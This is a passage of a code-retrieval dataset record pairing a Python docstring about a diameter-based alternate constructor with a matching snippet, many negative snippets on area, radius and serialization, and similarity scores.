self.crs.ellipsoid.b\n\n area = 0.0\n if major_axis == minor_axis: # Sphere\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.spherical_area(major_axis, x1, y1, x2, y2)\n\n else:\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.ellipsoidal_area(major_axis, minor_axis,\n x1, y1, x2, y2)\n\n else:\n # Cartesian coordinate systems\n x, y = self.coordinates\n x0 = np.min(x)\n area = (0.5*(x[0] + x[-1]) - x0) * (y[0] - y[-1])\n area += sum((0.5*(x[i+1]+x[i]) - x0) * (y[i+1] - y[i]) for i in range(len(x)-1))\n return abs(area) - sum(sub.area for sub in self.subs)", "def area(self):\n return self._ned_shape.area", "def area(self) -> float:\n raise NotImplementedError", "def area(self):\n\n return (self.x1 - self.x0) * (self.y1 - self.y0)", "def surface_area(self) -> float:\n return 4 * np.pi * self.radius**2", "def area(width, height):\n return width * height", "def area(self):\n return (self.baselength1 + self.baselength2)*self.height/2", "def area(self):\n num_rows = self.row_end - self.row_start\n num_cols = self.col_end - self.col_start\n area = num_rows*num_cols\n return area", "def area(self):\n return 0.5*np.abs(np.dot(self.x,np.roll(self.y,1))-np.dot(self.y,np.roll(self.x,1)))", "def area_equilat(side):\n\treturn side/2 * math.sqrt(side**2 - (side/2)**2)", "def area(self):\n area = self._lengths[0] * self._lengths[1] * math.sin(math.radians(self._angles[0]))\n area += self._lengths[2] * self._lengths[3] * math.sin(math.radians(self._angles[0]))\n return float('{:.2f}'.format(area * 0.5))", "def area(self):\n return self.length*self.length", "def area(self):\n area = self.__width * self.__height\n return area", "def area(self) -> npt.NDArray[np.float_]:\n points = self._normalized_projection()\n a = sum(det(points[..., [0, i, i + 1], :]) for i in range(1, points.shape[-2] - 1))\n return 1 / 2 * np.abs(a)", "def area(self):\n return(self.__width * self.__height)", "def area(self) -> float:\n return cross3(self.b.position - self.a.position,\n self.c.position - self.a.position).length() / 2.0", "def area(self):\n semi_perimeter = self.perimeter() / 2\n area = semi_perimeter\n for l in self._lengths:\n area *= (semi_perimeter - l)\n return float('{:.2f}'.format(area**0.5))", "def area(self):\n if len(self.exterior) < 3:\n raise Exception(\"Cannot compute the polygon's area because it contains less than three points.\")\n poly = self.to_shapely_polygon()\n return poly.area", "def area(self):\n area = self.__size * self.__size\n return area", "def area(base, height):\n\n return base * height", "def area(self):\n area = self.__size * self.__size\n return(area)", "def calculateDetectorArea(self):\n area = 0.0\n r = self.geoParam['CylinderLightGuideRadius']\n while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):\n area -= math.pow(r,2)\n r += self.geoParam['DetectorThickness']\n area += math.pow(r,2)\n r += self.geoParam['DetectorSpacing']\n return math.pi*area", "def _area(bounds):\n return (bounds[0, 1] - bounds[0, 0]) * (bounds[1, 1] - bounds[1, 0])", "def area(self):\n area = self.__length * self.__width\n\n return area", "def area(self):\n return (self.__width * self.__height)", "def area(self):\n return (self.__width * self.__height)", "def area(self):\n return (self.width * self.height)", "def area(self):\n area = 0\n\n for room in self.rooms:\n area += room.polygon.area()\n\n for wall in self.walls:\n area += wall.polygon.area()\n\n return area", "def test_circumference_area(self):\n self.assertEqual(9.425, circumference_area(self.values['radius']))", "def circle_area():\n import math # To use pi\n\n def number_format(num):\n \"\"\"\n Will check for errors when user inputs the number (used for all 4\n numbers).\n :param num: the number inputted\n :return: the proper number\n \"\"\"\n while True:\n try:\n user_input = float(input(num))\n return user_input\n except ValueError:\n print(\"Error. Please enter the desired number. You may use \"\n \"decimals.\")\n except:\n print(\"Error: unknown.\")\n\n def calculate_area(radius):\n \"\"\"\n The function that calculates the area of the circle.\n :param radius: The radius of the circle.\n \"\"\"\n area = math.pi * radius ** 2\n print(\"Area of a circle with a radius of\", radius, \"is\",\n format(area, \".3f\"))\n\n def main():\n \"\"\"\n Will ask the user for the radius of the circle, then print the area\n after consulting the function calculate_area(radius).\n \"\"\"\n radius = number_format(\"Please enter the radius of the circle: \")\n calculate_area(radius)\n\n main() # Call to main function, which will run a function within a\n # function.", "def ellipse_area(semi_major_axis: number, semi_minor_axis : number) -> number:\n area = pi*semi_major_axis*semi_minor_axis\n return area", "def rectangle_area(width : number, height : number) ->number:\n area = width*height\n #print(\"The area of rectangle is =\", area, \"sq. units\")\n return area", "def area(self):\n\t\treturn self.width() * self.height()", "def __CalculatePerimeter(self, curve):\r\n return cv2.arcLength(curve, True)", "def area(self):\n return _property_op(arctern.ST_Area, self)", "def perimeter(cnt):\n\treturn cv2.arcLength(cnt, True)", "def shaded_area(l):\n area = area_square(l) - area_circle(l)\n return area", "def area(length, hypotenuse):\n side = int(length)* hypotenuse\n return round(side*2, 2) # returns the rounded area of the roof.", "def calculatearea(self):\r\n return self.width * self.height", "def area(self):\n\t\treturn self.width * self.height", "def rectangle_area(coordinates):\n return (coordinates[2] - coordinates[0]) * (coordinates[3] - coordinates[1])", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def square_area(side):\n return side**2", "def area(self):\n return self.width*self.height", "def area(self):\n return self.width() * self.height()", "def calcular_area_circulo(radio, pi=3.141492):\n radio_int = float(radio)\n area=pi*radio_int**2\n print(area)", "def area(self):\n return self._width * self._height", "def area(self):\n return self.__width * self.__height" ]
[ "0.9091267", "0.8981688", "0.87279946", "0.8713818", "0.8643989", "0.8638605", "0.85790324", "0.8510922", "0.84058666", "0.84058666", "0.8388797", "0.8306146", "0.82901704", "0.8135795", "0.8114081", "0.8105787", "0.8105787", "0.8066629", "0.8049314", "0.8016954", "0.80149436", "0.79954755", "0.7971778", "0.7964131", "0.7944771", "0.79305047", "0.7909514", "0.78016585", "0.77608943", "0.7704746", "0.76927304", "0.7659684", "0.76242435", "0.7545448", "0.75433403", "0.75246304", "0.7520769", "0.743374", "0.7323644", "0.7276443", "0.7230806", "0.72300243", "0.7226463", "0.7148951", "0.7123549", "0.7102877", "0.7092133", "0.70780295", "0.7075342", "0.7070946", "0.7050679", "0.70428836", "0.70326114", "0.7009139", "0.7008671", "0.6970901", "0.6960966", "0.6928084", "0.692158", "0.691441", "0.6895525", "0.68784744", "0.6875036", "0.6850508", "0.6835515", "0.6826276", "0.68028265", "0.67809993", "0.67650396", "0.6757579", "0.6753227", "0.6752179", "0.67470026", "0.6734259", "0.67302555", "0.67302555", "0.6715301", "0.6710108", "0.6706513", "0.6700536", "0.6691746", "0.66785467", "0.6669621", "0.6666843", "0.66652095", "0.66639644", "0.6658473", "0.66562206", "0.66492873", "0.6646874", "0.66381025", "0.6635854", "0.6635854", "0.6635854", "0.6634582", "0.6626104", "0.6617104", "0.66169316", "0.66128707", "0.66071415" ]
0.7715051
29
Alternate constructor using diameter rather than radius
def from_diameter(cls, val): if val < 0: raise ValueError('Diameter must be greater than 0') return cls(val / 2)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, radius=1, thickness=1, inner_radius=0):\n\n super().__init__()\n self.radius = radius\n self.inner_radius = inner_radius\n self.thickness = thickness", "def diameter(self, diameter):\n self.radius = diameter / 2", "def __init__(self, radius):\n self.radius = radius", "def __init__(self, shape, r=2, d=-1):\n self.radius = r\n if d == -1:\n self.stride = 2*r+1\n else:\n self.stride = d\n self.image_shape = shape\n self.patch_shape = ( r*2+1, 2*r+1 )", "def __init__(self, inner_diameter=None, length=None, material=None):\n self.inner_diameter = inner_diameter\n self.length = length\n self.material = material", "def __init__(self, diameter, sigma_color, sigma_space):\n self.v = 0\n self._diameter = diameter\n self._sigma_color = sigma_color\n self._sigma_space = sigma_space", "def __init__(self, c, radius, a0, da):\n Circle.__init__(self, Vector(c).to_2d(), radius)\n self.line = None\n self.a0 = a0\n self.da = da", "def diameter(self):\n return 2 * self.radius", "def __init__( self , center , radius ):\r\n self.center = center\r\n self.radius = radius", "def __init__(self, center=None, radius=1):\n if center is None:\n center = Point()\n self.center = center\n self.radius = radius", "def diameter(self):\n return self.radius * 2", "def diameter(self):\n return self.radius * 2", "def __init__(self, pos, radius):\n super().__init__(pos, radius)", "def __init__(self, pos, radius=0):\n super().__init__(pos, radius)", "def __init__(self, name: str, radius: float):\r\n\r\n Shape.__init__(self, name)\r\n self.__radius = radius\r\n self.validation()", "def __init__(self, center, radius, material):\n self.center = center\n self.radius = radius\n self.material = material", "def __init__(self, center, radius, material):\n self.center = center\n self.radius = radius\n self.material = material", "def __init__(self, pos, radius):\n self.pos = pos\n self.radius = radius", "def __init__(self, *, material: Material, radius=0.0):\n\n assert radius >= 0.0\n\n super().__init__(material=material)\n\n self.radius = radius", "def __init__(self, x_pos, y_pos, radius, colour, moving = False):\n\t\t\n\t\tself.x_pos = x_pos\n\t\tself.y_pos = y_pos\n\t\tself.radius = radius\n\t\tself.diameter = 2*radius\n\t\tself.colour = colour\n\t\tself.moving = moving\n\t\tself.x_vec = 0\n\t\tself.y_vec = 0", "def __init__(self, (x,y), size):\n self.x = x\n self.y = y\n self.size = size\n self.colour = (0,128,255)\n self.thickness = 1\n self.speed = 0.01\n self.angle = math.pi/2", "def __init__(self, name, type_name, diameter, radius_of_curvature, elbow_angle, orientation, surface_roughness):\n self.name = name\n self.type = type_name\n self.diameter = diameter\n self.radius_of_curvature = radius_of_curvature\n self.orientation = orientation\n self.surface_roughness = surface_roughness\n self.elbow_angle = elbow_angle\n self.RperD = radius_of_curvature / diameter\n self.surface_roughnessratio = surface_roughness / diameter", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def __init__(self,r):\n self.radius = r\n self.uc_centered_a = r\n self.uc_centered_b = r*np.sqrt(3.0)", "def __init__(self, center, initialRadius, finalRadius, initialAngle, finalAngle, cartesianImageSize,\n polarImageSize):\n self.center = center\n self.initialRadius = initialRadius\n self.finalRadius = finalRadius\n self.initialAngle = initialAngle\n self.finalAngle = finalAngle\n self.cartesianImageSize = cartesianImageSize\n self.polarImageSize = polarImageSize", "def __init__(self, size=None, color=None, clip=None,\n radius=0.):\n BasicFrame.__init__(self, size, color, clip)\n self.radius_value = style.DEF_RADIUS if radius is None else radius\n if 0. <= radius <= 1.:\n self.radius_value = min(self.size) * radius", "def getCircleDiameter(self):\n segments = []\n for (i, p1) in enumerate(self.points):\n for p2 in self.points[i+1:]:\n segments.append(Segment(p1, p2))\n s = max(segments, key=lambda s: s.length)\n return Circle(*s.middle, radius=s.length/2)", "def __init__(self, coordinate, speed_vec, size):\n # todo - validate size 1-3 and int\n self.__size = size\n super().__init__(coordinate, speed_vec, get_radius(size))", "def __init__(self, angle = 0, center = (0, 0)):\n\n self.angle = angle\n self.center = center\n self.size = (2 * 194 + 3, 185)", "def __init__(\r\n self,\r\n centre: Tuple[float, float] = (0.0, 0.0),\r\n ell_comps: Tuple[float, float] = (0.0, 0.0),\r\n einstein_radius: float = 1.0,\r\n core_radius: float = 0.01,\r\n ):\r\n super().__init__(\r\n centre=centre,\r\n ell_comps=ell_comps,\r\n einstein_radius=einstein_radius,\r\n slope=2.0,\r\n core_radius=core_radius,\r\n )", "def diameter(self, diameter):\n\n self._diameter = diameter", "def __init__(\r\n self,\r\n centre: Tuple[float, float] = (0.0, 0.0),\r\n einstein_radius: float = 1.0,\r\n core_radius: float = 0.01,\r\n ):\r\n super().__init__(\r\n centre=centre,\r\n einstein_radius=einstein_radius,\r\n slope=2.0,\r\n core_radius=core_radius,\r\n )", "def __init__(self, name, type_name, length, diameter, orientation, surfaceroughness, hole_diameter):\n self.name = name\n self.type = type_name\n self.length = length\n self.diameter = diameter\n self.orientation = orientation\n self.surfaceroughness = surfaceroughness\n self.hole_diameter = hole_diameter", "def __init__(self, name, type_name, length, diameter, gate_diameter, orientation):\n self.name = name\n self.type = type_name\n self.length = length\n self.diameter = diameter\n self.orientation = orientation\n self.gate_diameter = gate_diameter", "def __init__(self, name, type_name, delta, b, D):\n self.name = name\n self.type = type_name\n self.length = 0\n self.delta = delta\n self.b = b\n self.diameter = D", "def __init__(self, shape: Tuple[int, int], spacing: float, asymmetric_grid: bool):\n cols, rows = shape\n super().__init__(\n CalibrationTargetType.CircleGrid,\n rows,\n cols,\n spacing=spacing,\n asymmetric_grid=asymmetric_grid,\n )", "def __init__(self, name, type_name,h, D, alpha):\n self.name = name\n self.type = type_name\n self.length = 0\n self.h = h\n self.diameter = D\n self.alpha = alpha", "def __init__(self, vert_count, radius):\n\n self.vert_count = vert_count # Number of vertices of polygon\n self.radius = radius # Circumradius\n self.interior_angle_l = None \n self.edge_length_l = None\n self.apothem_l = None \n self.area_l = None \n self.perimeter_l = None", "def diameter(self, value):\n try:\n value = float(value)\n if (value < 0.0) == True:\n print('The diameter must be a non-negative numeric value.')\n return None\n else:\n pass\n \n except TypeError:\n print('You have entered a non-numeric value for the diameter.')\n return None\n except ValueError:\n print('You have entered a non-numeric value for the diameter.')\n return None\n self._radius = value/2.0\n self._diameter = value", "def __init__(self, index=0, radius=0, center=[0, 0], axial=[0, 0], active=0):\n self._index = index\n self._radius = radius\n self._center = [center[0], center[1]]\n self._coord = [axial[0], axial[1]]\n self._active = active\n self._color = (50, 50, 50)", "def __init__(self, disk_radius=None, even_sampling=False, no_data_value=None, ignore_labels=None):\n self.disk_radius = disk_radius\n self.ignore_labels = [] if ignore_labels is None else ignore_labels\n self.even_sampling = even_sampling\n self.no_data_value = no_data_value", "def get_radius(self):", "def __init__(self, diameter, height, height_of_reservoir=None, material=None):\n g = 9.81 # m/s**2\n\n self.material = material\n self.diameter = diameter\n self.height = height\n self.volume = np.pi*self.diameter**2/4\n self.height_of_reservoir = height_of_reservoir\n if material and height_of_reservoir:\n self.hydrostatic_pressure = material.density*g*self.height_of_reservoir", "def __init__(self, width, height, circular=True):\n self.width = width\n self.height = height\n self.size = width * height\n self.idx_list = []\n self._depth_buffer = [[] for _ in range(self.size)]\n self._depth = [0] * self.size\n self.circular = circular", "def __init__(self, coordinates, strength=1.0, length=1.0):\n\n super().__init__(\n coordinates=coordinates, strength=strength, length=length)", "def __init__(self, coordinates, strength=1.0, length=1.0):\n\n super().__init__(\n coordinates=coordinates, strength=strength, length=length)", "def circle(self):\n return circle(self.N, self.o, self.r)", "def __init__(self, x_coor, x_speed, y_coor, y_speed, direction):\n self.__x_coor = x_coor\n self.__x_speed = x_speed\n self.__y_coor = y_coor\n self.__y_speed = y_speed\n self.__direction = direction\n self.__radius = self.TORPEDO_RADIUS", "def __init__(self, radius: float, location: tuple, name: str):\n self.loc = location\n self.radius = radius\n self.name = name\n self.verts = []\n self.edges = []\n self.faces = []\n self.mesh_data = None\n self.obj = None", "def __init__(self, x, y, radius, segments=None, angle=math.tau, start_angle=0,\n closed=False, color=(255, 255, 255, 255), batch=None, group=None):\n self._x = x\n self._y = y\n self._radius = radius\n self._segments = segments or max(14, int(radius / 1.25))\n self._num_verts = self._segments * 2 + (2 if closed else 0)\n\n # handle both 3 and 4 byte colors\n r, g, b, *a = color\n self._rgba = r, g, b, a[0] if a else 255\n\n self._angle = angle\n self._start_angle = start_angle\n self._closed = closed\n self._rotation = 0\n\n self._batch = batch or Batch()\n program = get_default_shader()\n self._group = self.group_class(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, program, group)\n\n self._create_vertex_list()\n self._update_vertices()", "def get_radius(self):\r\n return 1", "def __init__(self, *args, radius, fill=False, color=colors.WHITE, border_color=None, area_color=None,\n center_color=None, radius_color=None, radius_width=1, text_color=None, text_size=20):\n if len(args) == 1: args = args[0]\n self.position = list(args)\n self.radius = radius\n self.fill = fill\n if color:\n if not border_color: border_color = color\n if not area_color: area_color = color\n if not radius_color: radius_color = color\n if not text_color: text_color = color\n self.border_color = border_color\n self.area_color = area_color\n self.center_color = center_color\n self.radius_color = radius_color\n self.radius_width = radius_width\n self.text_color = text_color\n self.text_size = text_size", "def _circle(i, r=.05):\n\treturn Circle((i, 0), r, fill=True, color='black')", "def __init__(self, a, **kwargs):\r\n center = kwargs.get('center')\r\n density = kwargs.get(\"density\")\r\n spheroid.__init__(self, a, center=center, density=density)", "def get_radius(size):\n return (size * 10) - 5", "def __init__(self, x, y, max_pop, radius=50, color=RED, infected_pop=0, infected_rate=1.1, dead_pop=0, death_rate=1, airborne_rate=0):\n self.initial_pos = (x, y)\n self.x = x\n self.y = y\n self.color = color\n self.radius = radius\n self.infected_pop = infected_pop\n self.infected_rate = infected_rate\n self.max_pop = max_pop\n self.dead_pop = dead_pop\n self.death_rate = death_rate\n self.airborne_rate = airborne_rate", "def __init__(self, *components, mode=0, size=[0.1, 0.1], width=1, radius=0.02, fill=False, color=colors.WHITE,\n conversion=True):\n if components != ():\n if type(components[0]) == list:\n components = components[0]\n self.components = list(components)\n self.mode = mode\n self.size = size\n self.width = width\n self.radius = radius\n self.fill = fill\n self.color = color\n self.conversion = conversion", "def objects_radius(self, centre, radius):", "def __init__(self, width, height, radius, k=20):\n self.width = width\n self.height = height\n self.radius = radius\n self.k = k\n self.cell_size = self.radius * 1.0 / np.sqrt(2.0)\n self.grid_width = int(np.ceil(self.width / self.cell_size))\n self.grid_height = int(np.ceil(self.height / self.cell_size))\n self.grid = [-1] * (self.grid_height * self.grid_width)\n self.queue = []\n self.samples = []", "def make_circle(x, y, r):\n\tnew_circle = Circle()\n\tnew_circle.x = x\n\tnew_circle.y = y\n\tnew_circle.r = r\n\treturn new_circle", "def __init__(self,circlePos,circleRad,circleVel):\n self.circlePos=circlePos\n self.circleRad=circleRad\n self.circleVel=circleVel", "def __init__(self, scr, color, pos, radius, width=0):\n self.scr = scr\n self.color = color\n self.pos = pos\n self.r = radius\n self.width = width\n return", "def __init__(self, centre: np.ndarray, radius: float, start_degrees: float, end_degrees: float):\n self.centre = np.reshape(centre, 2)\n self.radius = radius\n self.start_degrees = start_degrees\n self.end_degrees = end_degrees", "def __init__(self, master, x, y, size):\n self.master = master\n self.abs = x\n self.ord = y\n self.size= size\n self.fill= False", "def create_circle(self, x, y, r, **kwargs):\n return self.create_oval(*self.circ_to_oval(x, y, r), **kwargs)", "def __init__(self, radius):\n try:\n radius = float(radius)\n if (radius < 0.0) == True:\n print('The radius must be a non-negative numeric value.')\n return None\n #I put this here to abort construction. Im not sure its working the way I want.\n else:\n pass\n except TypeError:\n print('You have entered a non-numeric value for the radius.')\n return None\n except ValueError:\n print('You have entered a non-numeric value for the radius.')\n return None\n #Class parameters (radius, diameter)\n self._radius = radius\n #Task 1\n self._diameter = self._radius*2\n #Task 2", "def test_set_diameter():\n radius = 10\n c = Circle(radius) \n expected_diameter = 10 \n c.diameter = expected_diameter \n assert c.diameter == expected_diameter\n assert c.radius == expected_diameter / 2", "def __init__(self):\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n self.total_distance_covered = 0.0", "def __init__(self,\n height=None,\n length=None,\n weight=None,\n width=None):\n\n # Initialize members of the class\n self.height = height\n self.length = length\n self.weight = weight\n self.width = width", "def __init__(self, coordinates, strength=1.0):\n\n super().__init__(coordinates=coordinates, strength=strength)", "def __init__(self, coordinates, strength=1.0):\n\n super().__init__(coordinates=coordinates, strength=strength)", "def __init__(self, coordinates, strength=1.0):\n\n super().__init__(coordinates=coordinates, strength=strength)", "def __init__(self):\n self.x = int(constants.SCREEN_WIDTH/2)\n self.y = int(constants.SCREEN_HEIGHT/2)\n self.DX = self.getRandSpeed()\n self.DY = self.getRandSpeed()\n self.RADIUS = 5", "def __init__(self, size, mu, theta, sigma):\n self.mu = mu * np.ones(size)\n self.theta = theta\n self.sigma = sigma\n self.reset()", "def __init__(self, length, sides):\n self._sides = sides\n self._length = length", "def __init__(self, size, x=0, y=0, id=None):\n super().__init__(size, size, x, y, id)\n self.size = size", "def __init__(self, name: str=None, red: float=None, green: float=None, blue: float=None, radius: float=None, modifier: str='void'): # noqa: E501\n self.swagger_types = {\n 'name': str,\n 'red': float,\n 'green': float,\n 'blue': float,\n 'radius': float,\n 'modifier': str\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'red': 'red',\n 'green': 'green',\n 'blue': 'blue',\n 'radius': 'radius',\n 'modifier': 'modifier'\n }\n\n self._name = name\n self._red = red\n self._green = green\n self._blue = blue\n self._radius = radius\n self._modifier = modifier", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self,x_c,z_c,cyl_rad):\n self.x_c = x_c\n self.z_c = z_c\n self.cyl_rad = cyl_rad", "def __init__(self, normal, distance):\r\n self.normal = normal\r\n self.distance = distance", "def _init_parameters(self,diameterInd):\n\n\t\t# topological parameters\n\t\tself.nNodes = 21\n\t\tself._axonNodes=self.nNodes\n\t\tself._paraNodes1=40\n\t\tself._paraNodes2=40\n\t\tself._axonInter=120\n\t\tself._axonTotal=221\n\t\t# morphological parameters\n\t\tpossibleDiameters = [5.7, 7.3, 8.7, 10.0, 11.5, 12.8, 14.0, 15.0, 16.0]\n\t\tself._fiberD=possibleDiameters[diameterInd]\n\t\tself._paraLength1=3 \n\t\tself._nodeLength=1.0\n\t\tself._spaceP1=0.002 \n\t\tself._spaceP2=0.004\n\t\tself._spaceI=0.004\n\t\t# electrical parameters\n\t\tself._rhoa=0.7e6 #Ohm-um\n\t\tself._mycm=0.1 #uF/cm2/lamella membrane\n\t\tself._mygm=0.001 #S/cm2/lamella membrane\n\n\t\tif self._fiberD==5.7:\n\t\t\tself._g=0.605 \n\t\t\tself._axonD=3.4\n\t\t\tself._nodeD=1.9\n\t\t\tself._paraD1=1.9\n\t\t\tself._paraD2=3.4\n\t\t\tself._deltax=500\n\t\t\tself._paraLength2=35\n\t\t\tself._nl=80\n\t\tif self._fiberD==8.7:\n\t\t\tself._g=0.661\n\t\t\tself._axonD=5.8\n\t\t\tself._nodeD=2.8\n\t\t\tself._paraD1=2.8\n\t\t\tself._paraD2=5.8\n\t\t\tself._deltax=1000\n\t\t\tself._paraLength2=40\n\t\t\tself._nl=110\n\t\tif self._fiberD==10.0:\n\t\t\tself._g=0.690\n\t\t\tself._axonD=6.9\n\t\t\tself._nodeD=3.3\n\t\t\tself._paraD1=3.3\n\t\t\tself._paraD2=6.9\n\t\t\tself._deltax=1150\n\t\t\tself._paraLength2=46\n\t\t\tself._nl=120\n\t\tif self._fiberD==11.5:\n\t\t\tself._g=0.700\n\t\t\tself._axonD=8.1\n\t\t\tself._nodeD=3.7\n\t\t\tself._paraD1=3.7\n\t\t\tself._paraD2=8.1\n\t\t\tself._deltax=1250\n\t\t\tself._paraLength2=50\n\t\t\tself._nl=130\n\t\tif self._fiberD==12.8:\n\t\t\tself._g=0.719\n\t\t\tself._axonD=9.2\n\t\t\tself._nodeD=4.2\n\t\t\tself._paraD1=4.2\n\t\t\tself._paraD2=9.2\n\t\t\tself._deltax=1350\n\t\t\tself._paraLength2=54\n\t\t\tself._nl=135\n\t\tif self._fiberD==14.0:\n\t\t\tself._g=0.739\n\t\t\tself._axonD=10.4\n\t\t\tself._nodeD=4.7\n\t\t\tself._paraD1=4.7\n\t\t\tself._paraD2=10.4\n\t\t\tself._deltax=1400\n\t\t\tself._paraLength2=56\n\t\t\tself._nl=140\n\t\tif self._fiberD==15.0:\n\t\t\tself._g=0.767\n\t\t\tself._axonD=11.5\n\t\t\tself._nodeD=5.0\n\t\t\tself._paraD1=5.0\n\t\t\tself._paraD2=11.5\n\t\t\tself._deltax=1450\n\t\t\tself._paraLength2=58\n\t\t\tself._nl=145\n\t\tif self._fiberD==16.0:\n\t\t\tself._g=0.791\n\t\t\tself._axonD=12.7\n\t\t\tself._nodeD=5.5\n\t\t\tself._paraD1=5.5\n\t\t\tself._paraD2=12.7\n\t\t\tself._deltax=1500\n\t\t\tself._paraLength2=60\n\t\t\tself._nl=150\n\n\t\tself._Rpn0=(self._rhoa*.01)/(np.pi*((((self._nodeD/2)+self._spaceP1)**2)-((self._nodeD/2)**2)))\n\t\tself._Rpn1=(self._rhoa*.01)/(np.pi*((((self._paraD1/2)+self._spaceP1)**2)-((self._paraD1/2)**2)))\n\t\tself._Rpn2=(self._rhoa*.01)/(np.pi*((((self._paraD2/2)+self._spaceP2)**2)-((self._paraD2/2)**2)))\n\t\tself._Rpx=(self._rhoa*.01)/(np.pi*((((self._axonD/2)+self._spaceI)**2)-((self._axonD/2)**2)))\n\t\tself._interLength=(self._deltax-self._nodeLength-(2*self._paraLength1)-(2*self._paraLength2))/6", "def __init__(self, d=1):\r\n self.depth = d", "def __init__(self, radius=0.5, extra={}):\n self.radius = radius\n self.sensors = [] # array of Attached\n self.id_sensors = None\n self.id_dynamics = None # XXX\n self.dynamics = None\n self.extra = extra\n\n self.primitives = set()\n\n # Needs to be initialized before calling certain functions\n self._state = None", "def createFromPointAndRadius(cls, point, radius, **kwargs):\n return cls(*point, radius=radius, **kwargs)", "def __init__(self, grating: float, diameter: float, origin=[0., 0.], theta=0.,\n interference=1.,\n blocker_diameter: float = float('+Inf'),\n default_wavelengths: list = [532., 430, 650.],\n flipped: bool = False):\n\n Mirror.__init__(self, diameter, origin, theta, blocker_diameter, flipped)\n\n self.mirroring = False\n self.grating = grating\n self.interference = interference\n self.default_wavelengths = default_wavelengths", "def __init__(self, point, angle, color=colors.WHITE, width=1):\n super().__init__(point, angle, color=color, width=width, correct=False)", "def initP0(self, size, radius):\n return h.circle(size, radius)[:, :, 0]", "def computeA(diameter):\n radius = diameter / 2.0\n return np.pi * (radius**2)", "def from_plane_and_radius(cls, plane, radius):\n return cls(radius, frame=Frame.from_plane(plane))", "def __init__(self, num_sides=6):\n self.num_sides = num_sides", "def __init__(self, num_sides=6):\n self.num_sides = num_sides", "def __init__(self, num_sides=6):\n self.num_sides = num_sides", "def __init__(self, L_values=None, scatteringRadius=None, **kwargs):\n index = 0\n for attr in self.optAttrList:\n setattr(self, attr, kwargs.get(attr))\n self.L_values = L_values or []\n self.scatteringRadius = scatteringRadius\n if self.scatteringRadius: self.scatteringRadius.setAncestor( self )", "def __init__(self, master, x, y, size, colour):\n self.master = master\n self.abs = x\n self.ord = y\n self.size= size\n self.fill= colour", "def __init__(self, width=10, height=10, density=0.25):\n\t\tself.width = width\n\t\tself.height = height\n\t\t# create marks and mine field\n\t\tself.marks = [[CLOSED for _ in range(height)] for _ in range(width)]\n\t\tself.mines = [[random.random() < density for _ in range(height)] \n\t\t for _ in range(width)]", "def Radius(self, *args):\n return _Bnd.Bnd_Sphere_Radius(self, *args)", "def __init__(self, angle = 'deg'):\n \n name = \"Cylindrical\"\n Qstr = [\"r\", \"phi\", \"z\"]\n Xstr = [\"x\", \"y\", \"z\"]\n \n super().__init__(self._csCylindrical_q2x, nQ = 3,\n nX = 3, name = name, \n Qstr = Qstr, Xstr = Xstr,\n maxderiv = None, isatomic = False,\n zlevel = None)\n \n if angle == 'deg' or angle == 'rad':\n self.angle = angle # 'deg' or 'rad'\n else:\n raise ValueError('angle must be ''deg'' or ''rad''.')" ]
[ "0.7655539", "0.7464638", "0.71278536", "0.7123325", "0.7113612", "0.71134126", "0.7005773", "0.69776356", "0.68636364", "0.67984104", "0.678745", "0.678745", "0.6740642", "0.6733681", "0.6701746", "0.6677398", "0.6677398", "0.66244286", "0.6590522", "0.6543615", "0.64221567", "0.63389647", "0.62761277", "0.6240987", "0.6239006", "0.62186664", "0.6199971", "0.6177248", "0.616721", "0.61354274", "0.6130588", "0.61239797", "0.6119473", "0.61187446", "0.61064523", "0.6039022", "0.60348356", "0.60311764", "0.60182154", "0.6010675", "0.60003245", "0.59961665", "0.5960911", "0.5956303", "0.594565", "0.594565", "0.5940826", "0.5937744", "0.5927707", "0.59126663", "0.5905071", "0.59033126", "0.5900206", "0.5897612", "0.58667886", "0.58525425", "0.58102375", "0.57985866", "0.5793406", "0.57793385", "0.5770428", "0.5769469", "0.5753497", "0.5751543", "0.5746786", "0.5745165", "0.57449794", "0.57402414", "0.57316697", "0.5722496", "0.5722496", "0.5722496", "0.57212627", "0.5711052", "0.57071847", "0.5697192", "0.569603", "0.5687406", "0.5687406", "0.5687406", "0.5687406", "0.5687406", "0.568219", "0.56807256", "0.56732756", "0.5664853", "0.56576794", "0.56548035", "0.5647639", "0.5645089", "0.56371593", "0.56362796", "0.56360304", "0.56360304", "0.56360304", "0.56341034", "0.56332606", "0.5628254", "0.5627414", "0.56181055" ]
0.67468303
12
Returns the object data in serializable format
def serialize(self): return { 'username': self.username, 'email': self.email, 'joinedDate': self.joinedDate }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetDataAsObject(self):", "def serialize(self, obj):\n return obj", "def data(self):\n retval = copy.deepcopy(self.__dict__)\n retval[\"_Serializable_classname\"] = type(self).__name__\n retval[\"_Serializable_version\"] = \"1.0\"\n return retval", "def to_data(self):\n return self.data", "def serialize(self, obj):\n pass", "def serialize(self, data):\n return data", "def serialize(self):", "def SerializeObject(self, data):\n\n if isinstance(data,dict):\n serializad_data = json.dumps(data)\n else:\n serializad_data = json.dumps(data.__dict__)\n\n return serializad_data", "def serialize(self):\n pass", "def dump(self):\n return self._data.dump()", "def serialize(obj):\n return serialization_manager.serialize(obj)", "def dump(self):\n return json.dumps(self.__data)", "def serialize(self, data):", "def serialize_forstorage(cls, obj):\n return misc.serialize_forstorage(obj)", "def data(self):\n if self._data is None:\n if self.many:\n self._data = [self.to_native(item) for item in 